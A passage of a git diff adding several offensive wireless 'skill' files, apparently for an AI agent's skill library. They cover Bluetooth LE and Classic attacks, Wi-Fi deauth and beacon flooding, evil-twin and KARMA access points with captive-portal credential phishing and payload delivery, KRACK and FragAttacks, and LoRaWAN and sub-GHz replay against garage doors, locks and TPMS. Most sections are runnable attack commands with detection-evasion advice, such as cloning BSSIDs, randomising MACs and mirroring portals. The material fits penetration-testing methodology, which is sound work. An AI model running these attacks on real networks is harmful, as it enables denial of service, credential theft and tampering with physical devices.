Connections** (Bluetooth 4.2+) uses ECDH and is strong if Just Works isn't forced. + +## Sniffing the Pairing Exchange + +```bash +# TI CC1352-based: Sniffle (modern, multi-channel) +sudo Sniffle -c 37,38,39 -o pairing.pcap + +# Ubertooth (older but well-supported) +ubertooth-btle -f -c pairing.pcap + +# Then in Wireshark, decode with crackle +crackle -i pairing.pcap -o decrypted.pcap +# Crackle handles LE Legacy Pairing TK guessing for short-passkey/JustWorks +``` + +For LE Legacy Pairing with Just Works, crackle recovers the LTK in seconds. For LE Secure Connections, crackle returns "encrypted with strong key, no recovery." + +## Active MITM During Pairing + +```bash +# btproxy / mirage-action-with-mitm — relay between device and victim's phone +mirage-action-with-mitm +# Or: +git clone https://github.com/Charmve/btproxy +sudo python btproxy.py +``` + +If pairing is Just Works, you become the legitimate peer for both sides — read/modify GATT operations in real time. + +## Companion App Reverse Engineering + +For vendor-defined characteristics, the format is in the app: + +```bash +# Pull APK +adb pull /data/app/com.vendor.app/base.apk + +# Decompile +jadx -d app_src base.apk + +# Find BLE writes +grep -r "writeCharacteristic\|GATT_CHARACTERISTIC" app_src/ + +# Look at the bytes the app writes vs. observed in-air values +``` + +Hand off to `offensive-mobile` for deeper companion analysis. + +## Specific Device Classes + +### Smart Locks + +- Test `unlock` characteristic for unauth write +- Test if rolling token is replayable (capture-and-replay within window) +- Check for hardcoded LTK in firmware (chip-off + binary analysis — see `offensive-iot`) + +### Cars (BLE Phone-as-Key) + +- Relay attacks (extending range with two SDR-equipped relays, see Tesla research 2022) +- Pairing-state machine flaws + +### Medical Devices + +- Often use unauthenticated GATT for telemetry — read PHI as a proximity-based attacker +- Some allow remote configuration (insulin pumps, pacemakers — coordinate disclosure carefully) + +### Beacons (iBeacon, Eddystone) + +- Often configurable with default password (`0000`, `12345678`, vendor-specific) +- Rebrand for tracking-confusion or counter-marketing + +## Detection Considerations + +- BLE has no native intrusion detection comparable to Wi-Fi WIDS +- Vendor cloud may detect anomalous characteristic patterns (rare) +- Pairing failure logs visible to user — multiple Just Works prompts may trigger suspicion + +## Engagement Cheatsheet + +```bash +# 1. Discover +sudo bettercap -eval "ble.recon on; events.show 60" + +# 2. Connect + enum GATT +sudo bettercap -eval "ble.enum " + +# 3. Probe every characteristic for unauth read/write +for h in ; do gatttool -b --char-read --handle=$h; done + +# 4. Inspect pairing — Just Works detected? +bluetoothctl pair + +# 5. If Just Works: sniff during real pair, crack LTK with crackle +sudo Sniffle -c 37,38,39 -o pair.pcap +crackle -i pair.pcap + +# 6. RE companion app for proprietary commands +jadx -d app_src vendor.apk +``` + +--- + +## Key References + +- Sniffle: github.com/nccgroup/Sniffle +- crackle: github.com/mikeryan/crackle +- bettercap BLE module: bettercap.org +- Bluetooth Core Spec 5.x — Volume 3 (Host) for GATT/SMP +- "Bluetooth Low Energy Hacking" (Cap Gemini, NCC research) +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-bluetooth-classic/SKILL.md b/Skills/wireless/offensive-bluetooth-classic/SKILL.md new file mode 100644 index 0000000..7cf477b --- /dev/null +++ b/Skills/wireless/offensive-bluetooth-classic/SKILL.md @@ -0,0 +1,156 @@ +--- +name: offensive-bluetooth-classic +description: "Bluetooth Classic (BR/EDR) attack methodology — device discovery, service enumeration via SDP, LMP/L2CAP layer attacks, legacy PIN cracking (BlueBorne / KNOB), Bluetooth file-transfer abuse (BlueSnarfing legacy), unauthenticated profile abuse (HSP, HFP, OPP), and modern relevance against older industrial / automotive / accessory targets. Use when in-scope devices use Bluetooth Classic (Bluetooth ≤ 4.0 BR/EDR) — common in legacy car kits, industrial sensors, older medical devices, and audio accessories." +--- + +# Bluetooth Classic (BR/EDR) Attacks + +Older than BLE, less commonly attacked today, but still present in cars, industrial sensors, audio gear, and legacy enterprise hardware. Many of the well-known historic attacks (BlueSnarf, BlueBug) are mitigated; KNOB and the BlueBorne family remain relevant against unpatched devices. + +## Quick Workflow + +1. Discover devices with `hcitool` / `bluetoothctl` / `redfang` +2. Enumerate exposed services via SDP +3. Test each service profile for unauth access +4. Check pairing crypto (KNOB applicability) +5. Proximity-physical attacks for legacy / unpatched + +--- + +## Discovery + +```bash +# Modern adapter (built-in or USB Bluetooth 4.0+) +sudo hciconfig hci0 up +sudo hcitool inq # inquiry +sudo hcitool scan --length=12 # 12-second scan + +# bluetoothctl interactive +bluetoothctl +> scan on +> devices + +# Discoverable-mode-only devices appear; non-discoverable need address brute +sudo redfang -r 00:00:00:00:00:00-FF:FF:FF:FF:FF:FF +# (very slow — ~7 hours per OUI prefix) +``` + +## Service Discovery (SDP) + +```bash +# List all services on a device +sdptool browse AA:BB:CC:DD:EE:FF +sdptool records AA:BB:CC:DD:EE:FF +``` + +Common profiles and their attack relevance: + +| Profile | UUID | Attack | +|---|---|---| +| OBEX Object Push (OPP) | 0x1105 | BlueSnarf/BlueBug on legacy phones (mostly extinct) | +| OBEX File Transfer (FTP) | 0x1106 | Browse / write filesystem on legacy devices | +| Headset (HSP/HFP) | 0x1108 / 0x111E | Eavesdrop active call audio | +| Serial Port Profile (SPP) | 0x1101 | Industrial/IoT debug ports — often unauthenticated | +| HID | 0x1124 | Keyboard/mouse impersonation | +| Audio Sink/Source (A2DP) | 0x110B / 0x110A | Audio injection/eavesdrop | + +## SPP Abuse + +The Serial Port Profile (SPP) tunnels arbitrary data over Bluetooth as a virtual COM port. Industrial / IoT devices use it for debug or telemetry, often without authentication. + +```bash +# Connect to SPP service, channel typically 1 +sudo rfcomm bind /dev/rfcomm0 AA:BB:CC:DD:EE:FF 1 +sudo screen /dev/rfcomm0 9600 +# Then interact with the device's CLI / debug menu +``` + +## KNOB (CVE-2019-9506) + +Forces Bluetooth pairing to negotiate a 1-byte encryption key — making the link key trivially brute-forceable. + +```bash +# Test with internalblue (requires Broadcom firmware patch) +git clone https://github.com/seemoo-lab/internalblue +internalblue +> log keys +# Patch firmware to allow 1-byte key; pair with target; observe weak key +``` + +Patched in firmware on most modern devices. Still works against: +- Older Broadcom-based devices (pre-2019 BCM chipsets) +- Embedded automotive Bluetooth stacks +- Cheap consumer audio gear + +## BlueBorne (CVE-2017-1000251 et al.) + +A family of buffer overflows / info leaks in major Bluetooth stacks (Linux BlueZ, Android, Windows, iOS). Mostly patched 2017–2018, but unpatched embedded Linux devices are common. + +```bash +# Armis blueborne-scanner — checks for patch-level +git clone https://github.com/ArmisSecurity/blueborne +python blueborne_scanner.py AA:BB:CC:DD:EE:FF +``` + +## HID Spoofing (PoC) + +If pairing succeeds via Just Works or weak PIN, you can register as a HID device — keystroke injection on an unattended Bluetooth-paired host. + +```bash +# bdaddr + HID example — register custom HID on rfcomm +hcitool dev +hciconfig hci0 class 0x000540 # HID device class +sdptool add HID +# Use a HID descriptor crafted as keyboard, send keystrokes +``` + +## Audio Eavesdropping + +If a target has Bluetooth headset paired and active, and you can re-pair (PIN brute or KNOB): + +- HSP/HFP profiles let you become the peer and receive audio +- Some firmware allows simultaneous peer connections — eavesdrop without disrupting + +## Engagement Cheatsheet + +```bash +# 1. Discover +sudo hcitool inq + +# 2. Enumerate services per device +sdptool browse + +# 3. SPP (industrial/IoT) — connect and explore +sudo rfcomm bind /dev/rfcomm0 1 +sudo screen /dev/rfcomm0 9600 + +# 4. Patch-level scan +python blueborne_scanner.py + +# 5. KNOB testing (with adapter that supports internalblue) +internalblue → log keys → re-pair target + +# 6. Document profiles, auth state, exposed commands per device +``` + +## Detection + +- No native Bluetooth Classic IDS in most environments +- Active inquiry visible to nearby Bluetooth-aware monitoring (rare) +- Re-pairing prompts on target devices may surface to users + +## Reporting + +- Identify chipset + firmware version per device (often visible in service records) +- Map CVE applicability (BlueBorne, KNOB, BlueFrag, et al.) +- Document specific profile abuses (SPP exposed without auth, HID spoofing successful, etc.) + +--- + +## Key References + +- internalblue: github.com/seemoo-lab/internalblue +- KNOB attack: knobattack.com +- BlueBorne: armis.com/blueborne +- Bluetooth Core Spec — Volume 2 (BR/EDR Controller) +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-deauth-disassoc/SKILL.md b/Skills/wireless/offensive-deauth-disassoc/SKILL.md new file mode 100644 index 0000000..d5a7ea8 --- /dev/null +++ b/Skills/wireless/offensive-deauth-disassoc/SKILL.md @@ -0,0 +1,132 @@ +--- +name: offensive-deauth-disassoc +description: "Deauthentication and disassociation attacks against 802.11 networks — targeted single-client deauth for handshake capture, broadcast deauth for DoS (with authorization), action-frame attacks bypassing 802.11w (PMF), beacon flooding, mdk4 / aireplay-ng tooling, and rate-limit / PMF-aware operation. Use to coerce client reconnection (handshake capture, evil-twin roaming), as targeted DoS, or to test PMF posture." +--- + +# Deauth / Disassoc Attacks + +The most-used 802.11 management-frame attack: send a forged deauthentication or disassociation frame as the AP, and the client disconnects. Modern PMF (802.11w) authenticates these frames cryptographically — but most consumer and many enterprise deployments still don't require PMF. + +## Quick Workflow + +1. Identify target client + AP (BSSID, channel) +2. Pick deauth scope: single client (quiet) vs. broadcast (loud, DoS) +3. Verify PMF status — if required, classic deauth fails; pivot to action-frame attacks +4. Send the deauth burst at the right rate + +--- + +## Single-Client Deauth (Preferred) + +Used to force handshake capture, push client to evil twin, or test reconnection behavior. + +```bash +sudo aireplay-ng --deauth 5 \ + -a AA:BB:CC:DD:EE:FF \ # AP BSSID + -c 11:22:33:44:55:66 \ # client MAC + wlan0mon +``` + +- `--deauth 5` sends 5 deauths (10 frames — 5 to AP, 5 to client). 3–10 is usually enough. +- More than 30 in a burst is unnecessarily noisy. + +## Broadcast Deauth (DoS, Use Sparingly) + +```bash +# Single AP, all clients +sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon +# --deauth 0 = continuous + +# Multiple APs from a list +sudo mdk4 wlan0mon d -B target_bssids.txt -c 1,6,11 +``` + +Only with explicit authorization. Continuous broadcast deauth is a clear DoS signal and trips most WIPS within seconds. + +## PMF (802.11w) Awareness + +PMF authenticates deauth/disassoc frames. Status visible in beacon RSN capabilities: + +```bash +sudo airodump-ng wlan0mon -c --bssid +# PMF column: Required / Capable / Off +``` + +| PMF Status | Deauth Effect | +|---|---| +| Off | Classic deauth works | +| Capable (optional) | Works against clients without PMF, fails against PMF-enabled clients | +| Required | Classic deauth ignored — must use action-frame attacks | + +## Action-Frame Attacks Against PMF + +PMF protects deauth/disassoc but doesn't always protect all action frames. Specific action types remain exploitable: + +```bash +# mdk4 multi-tool attacks +sudo mdk4 wlan0mon a -a # auth attack: floods auth frames, AP eventually disconnects clients +sudo mdk4 wlan0mon m -t # CTS frame attack — abuse virtual carrier sense +sudo mdk4 wlan0mon w -t # WPA-Enterprise: SAE auth flood +``` + +Action frames the IEEE 802.11 spec marks as "may be unprotected" include some block-ack and channel-switch announcements — implementation-specific exploitation paths exist but require chipset-specific testing. + +## Beacon Flooding + +Confuse clients (and WIPS) by flooding fake beacons: + +```bash +sudo mdk4 wlan0mon b -f beacon_essids.txt -c 6 -s 100 +# Floods 100 beacons/sec for ESSIDs in the file +``` + +Use cases: +- Hide your evil twin among noise +- Stress-test client roaming logic +- DoS WIPS dashboards (flood with thousands of fake APs) + +## Rate Tuning and Detection + +| Burst | Defender Signal | +|---|---| +| 3–10 deauth, single client | Often misclassified as roaming or RF noise | +| >30 deauth/sec from one source | WIPS rule trips | +| Continuous broadcast deauth | Clear DoS — alert + ticket within minutes | +| Beacon flood >50/sec | Saturates WIPS dashboards | + +Randomize source MAC across burst-and-pause cycles to spread the signal. + +## Engagement Cheatsheet + +```bash +# 1. Recon — note PMF status per target +sudo airodump-ng wlan0mon -c --bssid + +# 2. Single-client deauth for handshake capture +sudo aireplay-ng --deauth 3 -a -c wlan0mon + +# 3. PMF blocking? Try action-frame attacks +sudo mdk4 wlan0mon a -a + +# 4. DoS scenario (authorized) +sudo aireplay-ng --deauth 0 -a wlan0mon +``` + +## Reporting + +Document for each test: + +- Target BSSID + ESSID + PMF status +- Burst size, duration +- Effect observed (client reconnected? handshake captured? DoS achieved?) +- Detection signals defender would have seen + +--- + +## Key References + +- aireplay-ng documentation +- mdk4: github.com/aircrack-ng/mdk4 +- IEEE 802.11w-2009 (PMF spec, now folded into 802.11-2020) +- "Why MAC Address Randomization Doesn't Work" — research on action-frame leakage +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-evil-twin/SKILL.md b/Skills/wireless/offensive-evil-twin/SKILL.md new file mode 100644 index 0000000..beb4b7c --- /dev/null +++ b/Skills/wireless/offensive-evil-twin/SKILL.md @@ -0,0 +1,220 @@ +--- +name: offensive-evil-twin +description: "Evil Twin / KARMA / Mana access point methodology — rogue AP construction with hostapd-mana / wifiphisher / airgeddon, KARMA universal probe response, Mana selective probe response, captive portal phishing, deauth-driven client coercion to attacker AP, MAC randomization defeat via PNL leak analysis, post-association MITM (DNS, ARP, transparent proxy), credential capture for portal/web/SMB, and detection-evasion tactics. Use to coerce client devices onto an attacker-controlled AP, intercept their traffic, harvest credentials, or deliver payloads via captive portal." +--- + +# Evil Twin / KARMA / Mana + +Stand up an AP that looks like (or is more attractive than) the legitimate target. Clients associate, you become their gateway, you intercept everything. The classic "captive portal at the airport" attack pattern, scaled to whatever the engagement requires. + +## Quick Workflow + +1. Discover target ESSID(s) clients are looking for (PNL — Preferred Network List) +2. Stand up rogue AP advertising matching ESSID(s) +3. (Optional) Deauth clients off legitimate AP to push them toward yours +4. Run captive portal / transparent MITM +5. Capture creds, deliver payload, or harvest sessions + +--- + +## Variants + +| Variant | Mechanic | Use Case | +|---|---|---| +| **Evil Twin** | Same ESSID + BSSID as legit AP | Open or PSK-known networks (ISP cafe Wi-Fi, public guest) | +| **KARMA** | Respond "yes" to every probe request | Clients with broad PNLs (most older devices) | +| **Mana** | Respond selectively to probes per-client | KARMA-aware MAC randomization defenses | +| **Known Beacons** | Beacon a list of likely-known ESSIDs | Wide-net attraction without seeing probes first | +| **Captive Portal** | Force splash page on association | Phishing, payload delivery | + +## Open / PSK-Known Evil Twin + +Use when you know (or have cracked) the PSK. + +```bash +# wifiphisher — opinionated automation including portal templates +sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd + +# airgeddon (interactive menu, good for one-off) +sudo airgeddon +# → Evil Twin attacks menu → Captive Portal + +# Manual: hostapd + dnsmasq + iptables redirect +cat > /tmp/hostapd.conf < /tmp/dnsmasq.conf < /tmp/karma.conf < /tmp/mana.conf < wlan0_mon2 +``` + +Combined with stronger signal (closer position) or higher TX power on your AP, the client roams to you on reconnection. + +**Detection trade-off:** broadcast deauth is loud; targeted single-client deauth is quieter. PMF (802.11w) blocks unencrypted deauth — see `offensive-deauth-disassoc`. + +## Captive Portal / Credential Capture + +```bash +# Portal options in eaphammer / wifiphisher / airgeddon include: +# - Generic OAuth-style (Google/MS/Facebook clones) +# - Vendor router login pages (matched to nearby AP brand) +# - Corporate-themed portal harvesting AD creds +# - Update-required prompts delivering EXE/APK payloads + +# Custom: simple Flask+iptables setup +iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 10.10.10.1:8080 +iptables -t nat -A POSTROUTING -j MASQUERADE +python3 -m flask run --host=10.10.10.1 --port=8080 +``` + +For high-fidelity portals, mirror the legitimate captive portal's HTML/CSS exactly. Most users skim, don't read URLs. + +## Post-Association MITM + +Once a client associates and you're their gateway: + +```bash +# Transparent TLS MITM (requires CA cert install on client OR clients with MITM-able apps) +mitmproxy --mode transparent --showhost --ssl-insecure + +# Bettercap full pipeline (sniff, ARP, DNS, JS injection) +sudo bettercap -iface wlan0 -eval "set arp.spoof.targets *; arp.spoof on; net.sniff on; http.proxy on" +``` + +Without portal-level CA install, modern HTTPS / HSTS / certificate pinning prevents most TLS interception. Useful targets: + +- Captive portal cleartext flows +- Apps with broken pinning (run `offensive-mobile` skills against the app) +- Plain-HTTP services still in use (legacy IoT, old mgmt panels) +- DNS hijack (return attacker IPs for non-pinned services) + +## MAC Randomization Defeat + +iOS, recent Android, and Windows 11 randomize MACs per network. They still leak per-network stable identifiers in: + +- Per-SSID MAC consistency (same MAC for same SSID over time) +- Probe sequence numbers +- 802.11 IE order (manufacturer fingerprint) + +```bash +# Cluster probes to track devices across MACs +hcxdumptool -i wlan0mon --enable_status=15 --rds=2 +# Analyze with hcxhash2cap / wifite-style fingerprinting +``` + +## Detection Considerations + +| Defender Signal | Mitigation by Attacker | +|---|---| +| Rogue AP detection (BSSID not in WIPS allow-list) | Match real BSSID exactly + suppress own AP advertisement | +| KARMA pattern (single AP responding to many ESSIDs) | Use Mana mode | +| RSSI delta (your AP closer than legit) | Run from a distance, lower TX power | +| Beacon timing inconsistency vs real AP | Match beacon interval, IE order | +| Captive portal HTML differs from real portal | Mirror exactly, refresh weekly | + +Modern enterprise WIPS will flag KARMA almost immediately. Mana + matched BSSID is harder to detect without active de-cloaking by defenders. + +## Engagement Cheatsheet + +```bash +# 1. Recon — passive observe target ESSIDs and clients (no probes from you) +sudo airodump-ng wlan0mon -w probes + +# 2. Pick mode based on environment +# - PSK known + co-located: spoofed BSSID + matched PSK + targeted deauth +# - Open networks (cafe, airport): straight evil twin or KARMA +# - Heterogeneous device population: Mana + +# 3. Stand up rogue AP +sudo hostapd-mana /tmp/mana.conf +sudo dnsmasq -C /tmp/dnsmasq.conf + +# 4. Captive portal / payload delivery / MITM +mitmproxy --mode transparent --showhost --ssl-insecure + +# 5. Coerce specific clients if needed (deauth on legit AP) + +# 6. Document captures, sessions, and time-on-target +``` + +--- + +## Key References + +- hostapd-mana: github.com/sensepost/hostapd-mana +- wifiphisher: wifiphisher.org +- airgeddon: github.com/v1s1t0r1sh3r3/airgeddon +- KARMA / Mana original talks (DEF CON, Sensepost research) +- "Probing into the Past" research on PNL exploitation +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-krack-fragattacks/SKILL.md b/Skills/wireless/offensive-krack-fragattacks/SKILL.md new file mode 100644 index 0000000..b0eb255 --- /dev/null +++ b/Skills/wireless/offensive-krack-fragattacks/SKILL.md @@ -0,0 +1,114 @@ +--- +name: offensive-krack-fragattacks +description: "KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants. Covers Vanhoef's test scripts, viability against modern patched stacks (mostly mitigated post-2021), residual unpatched embedded devices and IoT vendors, and the practical limitations of these attacks in modern engagements. Use when assessing legacy supplicants, embedded clients, or vendors with poor patch cadence." +--- + +# KRACK & FragAttacks + +Two attack families against WPA2 client implementations. Both well-disclosed (KRACK 2017, FragAttacks 2021) and largely patched on modern OSes — but the embedded/IoT long tail keeps them in scope for many engagements. + +## When These Apply + +| Family | Target | Patch Status | +|---|---|---| +| KRACK | WPA2 supplicants in 4-way handshake / GTK / FT / TDLS | Major OSes patched 2017–2018 | +| FragAttacks | Frame fragmentation/aggregation across WPA2/3 | Most stacks patched 2021–2022 | + +Probability of success today is high only against: +- Embedded OEM devices (cameras, sensors, point-of-sale) +- Old Android phones (<8 unpatched) +- Industrial / SCADA Wi-Fi clients +- Wi-Fi-enabled toys, smart bulbs, no-name IoT + +Modern Win11 / iOS 16+ / Android 13+ / hostapd-2.10 are mitigated. + +## KRACK — Key Reinstallation + +The 4-way handshake's M3 retransmission causes the supplicant to reinstall the same PTK with reset nonce/replay counters. Frames encrypted under the reused keystream become decryptable. + +```bash +# Vanhoef's official test scripts +git clone https://github.com/vanhoefm/krackattacks-scripts +cd krackattacks-scripts/krackattack +sudo ./krack-test-client.py --interface wlan0 +# Tests the supplicant on a connected client +``` + +Output identifies which CVE variants the client is vulnerable to. + +### Practical Outcomes + +When successful: +- Decryption of WPA2-encrypted frames between client and AP +- TKIP downgrade enables packet injection +- Recovery of session keys for the duration of the affected key cycle + +Not a PSK recovery — you don't get the wireless password from KRACK. + +## FragAttacks — Frame Splicing + +FragAttacks abuse 802.11 fragmentation and aggregation to inject frames that mix encrypted and plaintext fragments, or to splice attacker-controlled fragments into legitimate frames. + +```bash +git clone https://github.com/vanhoefm/fragattacks +cd fragattacks +sudo ./test-fragattacks.py wlan0 --interface wlan0 +# Suite of ~12 tests covering each variant +``` + +| CVE | Mechanism | +|---|---| +| CVE-2020-24588 | A-MSDU spoofing — inject crafted A-MSDU subframes | +| CVE-2020-24587 | Mixed-key fragment cache poisoning | +| CVE-2020-24586 | Decoupled fragment cache → reuse | +| CVE-2020-26139 | Forwarding plaintext frames before authentication | +| CVE-2020-26140 | Accepting plaintext frames in protected network | + +### Practical Outcomes + +- Inject malicious frames that the client treats as legitimate (HTTP redirect, DNS poison) +- Read decrypted fragments from cached state +- Cross-protect data exfil via crafted A-MSDU + +## Targeting Workflow + +1. Identify the in-scope client (MAC, OS, vendor) +2. Estimate patch likelihood — if modern OS, likely patched; if embedded, likely vulnerable +3. Run the test suite from a controlled AP setup +4. Report each vulnerable variant separately with the matching CVE + +```bash +# Rogue AP that drives the test +sudo hostapd-mana /tmp/krack_test_ap.conf + +# Force client to associate (deauth from real AP, or social-engineer) +sudo aireplay-ng --deauth 5 -a -c wlan0mon + +# Run test once associated +sudo ./krack-test-client.py --interface wlan0 +``` + +## Detection + +- WIPS may flag deauth-driven roams to attacker AP +- Test scripts generate distinctive frame patterns; modern WIPS recognizes Vanhoef's tooling +- Successful exploitation is essentially silent at protocol level + +## Reporting + +For each vulnerable CVE: + +- Client model + firmware version (be specific) +- Variant tested + result (vulnerable / patched / partial) +- Practical impact in the engagement context (decryption only, or injection viable?) +- Remediation: vendor patch URL, mitigation (WPA3 + PMF blocks most) + +--- + +## Key References + +- KRACK: krackattacks.com (Vanhoef) +- FragAttacks: fragattacks.com (Vanhoef) +- Original papers: USENIX Security 2017 (KRACK), USENIX Security 2021 (FragAttacks) +- CISA advisories tracking embedded vendor patches +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md b/Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md new file mode 100644 index 0000000..d17360a --- /dev/null +++ b/Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md @@ -0,0 +1,182 @@ +--- +name: offensive-lorawan-sub-ghz +description: "LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz protocol replay (KeeLoq garage doors, fixed-code remotes, TPMS spoofing, smart plug telemetry), HackRF / RTL-SDR / Flipper Zero workflows, signal analysis with Inspectrum / Universal Radio Hacker, and reconstruction of proprietary packet formats. Use for LoRaWAN deployments (smart cities, asset tracking, industrial telemetry), or any wireless device using the unlicensed 433/868/915 MHz bands (garage openers, doorbells, IoT sensors, RC equipment)." +--- + +# LoRaWAN & Sub-GHz Attacks + +LoRaWAN provides long-range low-bitrate communication for IoT — common in smart cities, asset tracking, and industrial telemetry. Outside LoRaWAN, the 433 / 868 / 915 MHz ISM bands host garage doors, doorbells, smart plugs, weather stations, and TPMS — most with weak or no crypto. + +## Quick Workflow + +1. Identify the band + modulation (LoRa CSS vs. simple OOK/FSK) +2. Capture transmissions with appropriate hardware (HackRF / RTL-SDR / Flipper Zero) +3. For LoRaWAN: capture join + uplinks; analyze key derivation +4. For proprietary sub-GHz: demodulate, identify packet format, replay or craft + +--- + +## Hardware + +| Tool | Range | Use | +|---|---|---| +| RTL-SDR | RX only, 24 MHz–1.7 GHz | Cheap reconnaissance | +| HackRF One | RX/TX, 1 MHz–6 GHz | Full transceiver | +| Flipper Zero | RX/TX, sub-GHz | Quick replays, fixed-code attacks | +| LimeSDR / BladeRF | RX/TX, wider band | Higher fidelity for LoRaWAN | +| YARD Stick One | TX-focused sub-GHz | Targeted replays | +| LoRa-specific gateway (RAK / Heltec) | LoRaWAN dual-direction | Standards-compliant LoRaWAN testing | + +## LoRaWAN + +LoRaWAN is a MAC layer over LoRa physical (chirp spread spectrum). Devices either: +- **OTAA** (Over-the-Air Activation) — derive session keys at join +- **ABP** (Activation By Personalization) — pre-flashed keys + +### OTAA Join Capture + +```bash +# Capture LoRa packets with HackRF + Inspectrum +hackrf_transfer -r capture.iq -f 868000000 -s 1000000 -n 60000000 +# Or LoRa-specific: rak_common_for_gateway + +# Decode with PHY + MAC stack +git clone https://github.com/Lora-net/LoRaMac-node +# Or use ChirpStack as a sniffing gateway +``` + +The Join-Request and Join-Accept are encrypted with the device's AppKey. With AppKey (extracted from device firmware — see `offensive-iot`): + +- Decrypt Join-Accept → recover NwkSKey, AppSKey +- Subsequent traffic decryption + injection + +### ABP — Pre-Flashed Keys + +ABP devices have NwkSKey + AppSKey flashed at manufacture. Common flaws: + +- Same key across thousands of devices (vendor laziness) +- No frame counter rollover protection → replay any historical uplink +- DevAddr predictability (sequential allocation) + +```bash +# If you have NwkSKey + AppSKey + DevAddr, decode/inject with lorawan-test-tools +git clone https://github.com/IoTsec/loraserver-attack-tools +python lora_inject.py --nwkskey --appskey --devaddr +``` + +### Frame Counter Replay + +Older LoRaWAN 1.0.x doesn't enforce strict frame counter monotonicity in all stacks. Replay an uplink with a different timestamp → server processes as fresh. + +### Downlink Injection + +If you control AppSKey + NwkSKey, you can inject downlinks (configuration changes, remote commands) to devices. + +## Sub-GHz Proprietary Protocols + +### Quick Capture + Replay (Flipper Zero / HackRF) + +```bash +# RTL-SDR live monitor +rtl_433 -f 433.92M -A # auto-decode many devices +gqrx # interactive spectrum analyzer + +# Flipper Zero Sub-GHz menu: Read → identify modulation → capture → save +# Then replay from the saved file + +# HackRF capture +hackrf_transfer -r garage.iq -f 433920000 -s 8000000 -n 80000000 +# Inspectrum to visualize, identify OOK / FSK, decode bits +``` + +### KeeLoq (Old Garage Doors, Some Cars) + +KeeLoq uses a 32-bit block cipher with a manufacturer key. The manufacturer key was extracted publicly years ago for major brands. With it: + +- Decrypt rolling code → predict next valid code +- Combined with capture-replay, take over the remote + +```bash +# rolling-code-tools (research) +git clone https://github.com/AndrewMohawk/RollingPwn +``` + +Modern KeeLoq deployments (last 5 years) have rotated manufacturer keys, but legacy hardware (older garage doors, some industrial equipment) is in scope. + +### Fixed-Code Remotes + +Many cheap garage openers, doorbells, and smart plugs use fixed codes — the same packet every time you press the button. Capture once, replay forever. + +```bash +# Flipper Zero: Read → Save → Send (from saved file) +# Or with RFCat: +python -c "import rflib; ..." +# OR with HackRF: +hackrf_transfer -t replay.iq -f 433920000 -s 8000000 +``` + +### TPMS Spoofing + +Tire-pressure monitoring sensors broadcast at 315/433 MHz with no authentication. Spoof low-pressure alerts: + +```bash +# Capture legitimate TPMS +rtl_433 -f 315M -F json | grep TPMS + +# Synthesize crafted alerts (custom modulator with HackRF) +# Useful for testing TPMS-aware vehicle systems or as denial-of-trust attack +``` + +### Reconstruction of Unknown Protocols + +```bash +# Universal Radio Hacker (URH) — visual reverse engineering +urh +# Load .iq capture, identify modulation visually, +# auto-detect symbols, decode bits, identify packet structure +``` + +URH walks you from raw RF to a parsed protocol description, even with no docs. + +## Engagement Cheatsheet + +```bash +# 1. Identify band + modulation +rtl_433 -f -A # auto-detect known protocols +gqrx # spectrum view to find activity + +# 2. For LoRaWAN +# - Set up gateway (or HackRF + LoRa decoding) +# - Capture joins + uplinks +# - Extract keys from device firmware (see offensive-iot) + +# 3. For proprietary sub-GHz +# - Capture with HackRF / RTL-SDR +# - Visualize / decode with Inspectrum or URH +# - Replay or craft + +# 4. Document modulation, frequency, packet format, replay viability +``` + +## Detection + +- LoRaWAN networks have server-side anomaly detection (frame counter, signal strength, geographic) — varies widely by operator +- Sub-GHz consumer products typically have no monitoring +- TPMS / industrial equipment has minimal telemetry on RF anomalies + +## Reporting + +- Identify exact frequency, modulation, baud, and packet format per device +- Distinguish capture-replay vs. crafted-frame attacks +- Note crypto state (cleartext / weak-fixed-key / standards-compliant) +- For LoRaWAN: identify AppKey / NwkSKey / AppSKey storage in firmware + +--- + +## Key References + +- rtl_433 protocol database: github.com/merbanan/rtl_433 +- Universal Radio Hacker: github.com/jopohl/urh +- RollingPwn (KeeLoq research): github.com/AndrewMohawk/RollingPwn +- LoRaWAN Specification: lora-alliance.org +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-wifi-recon/SKILL.md b/Skills/wireless/offensive-wifi-recon/SKILL.md new file mode 100644 index 0000000..aa3a5e5 --- /dev/null +++ b/Skills/wireless/offensive-wifi-recon/SKILL.md @@ -0,0 +1,203 @@ +--- +name: offensive-wifi-recon +description: "Wi-Fi reconnaissance methodology — adapter selection, monitor mode and packet injection setup, regulatory domain handling, multi-band airspace mapping, hidden SSID discovery, BSSID/ESSID/channel/PMF/encryption fingerprinting, client probe analysis, vendor OUI lookup, war-driving with Kismet/airodump-ng/Wigle, and structured airspace data capture for downstream attacks. Use at the start of any wireless engagement to build the target map before active attacks; covers 2.4 GHz, 5 GHz, and 6 GHz (Wi-Fi 6E) bands and adapter compatibility for each." +--- + +# Wi-Fi Reconnaissance + +The first phase of any wireless engagement. Build a complete picture of the airspace before you deauth, evil-twin, or capture handshakes — every later attack depends on knowing the right BSSID, channel, encryption, and client population. + +## Quick Workflow + +1. Pick the right adapter for the target's band(s) and PHY +2. Verify monitor mode + injection actually work +3. Set the regulatory domain (legal channels and TX power) +4. Sweep all bands passively +5. Drill down on each in-scope BSSID for client population and PMF status +6. Record everything in a structured target list before any active attack + +--- + +## Adapter Selection + +| Chipset | Strengths | Notes | +|---------|-----------|-------| +| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only | +| 